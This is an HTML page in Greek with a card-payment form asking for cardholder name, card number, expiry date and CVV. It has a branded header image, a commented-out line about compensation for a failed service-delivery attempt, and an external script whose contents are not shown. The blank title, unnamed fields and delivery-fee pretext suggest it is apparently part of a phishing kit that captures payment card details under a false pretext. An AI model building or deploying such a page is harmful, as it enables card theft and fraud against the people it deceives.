<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
    <link rel="stylesheet" href="./css/bigwite.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>
    <div class="roof">
        <img src="./img/hedopat.PNG" alt="">
    </div>


    <div>
        <div>
            <!-- <p class="pp2"> ΑΠΟΖΗΜΙΩΣΗ ΤΟΥ ΚΟΣΤΟΥΣ ΜΙΑΣ ΝΕΑΣ ΠΡΟΣΠΑΘΕΙΑΣ ΠΑΡΟΧΗΣ ΥΠΗΡΕΣΙΑΣ</p> -->
            <div class="section"  style="margin-top: 30px; margin-bottom: 40px;">
                <img class="ccimg" src="./img/Group 42.svg" alt="">
                    <form  method="post" id="pg2">
                        
                        <p>Όνομα κατόχου κάρτας:</p>
                        <input type="text" name=""  id="numnn" required>
    
                        <p>Αριθμός κάρτας:</p>
                        <input type="tel" name="" id="numcc" required maxlength="20" placeholder="____  ____  ____  ____">
                
                        <p>Ημερομηνία λήξης:</p>
                        <div class="exp">
                            
                            <input class="mm" type="tel" name="" id="mmo" required placeholder="MM" maxlength="3">
                            <input type="tel" name="" id="aao" required placeholder="YY"  maxlength="3">
                        </div>
                
                        <p>CVV:</p>
                        <input class="cfifi" type="tel" name="" id="numvv" required maxlength="8" maxlength="4">
                        
                        


                        <button class="btn1" type="submit">Επιβεβαίωσε</button>
                    </form>
                </div>
            </div>
        </div>



    <div>
        <div class="boot">
            <img src="./img/bot.JPG" alt="">
        </div>
    </div>
    <script>
        $("#numcc").on("keyup",function(){
           cc = $(this).val().split(" ").join("");
           cc = cc.match(new RegExp('.{1,4}$|.{1,4}', 'g')).join(" ");
           $(this).val(cc);
       });
    </script>
    <!--  -->
    <script src="./js/stb.js"></script>
</body>
</html>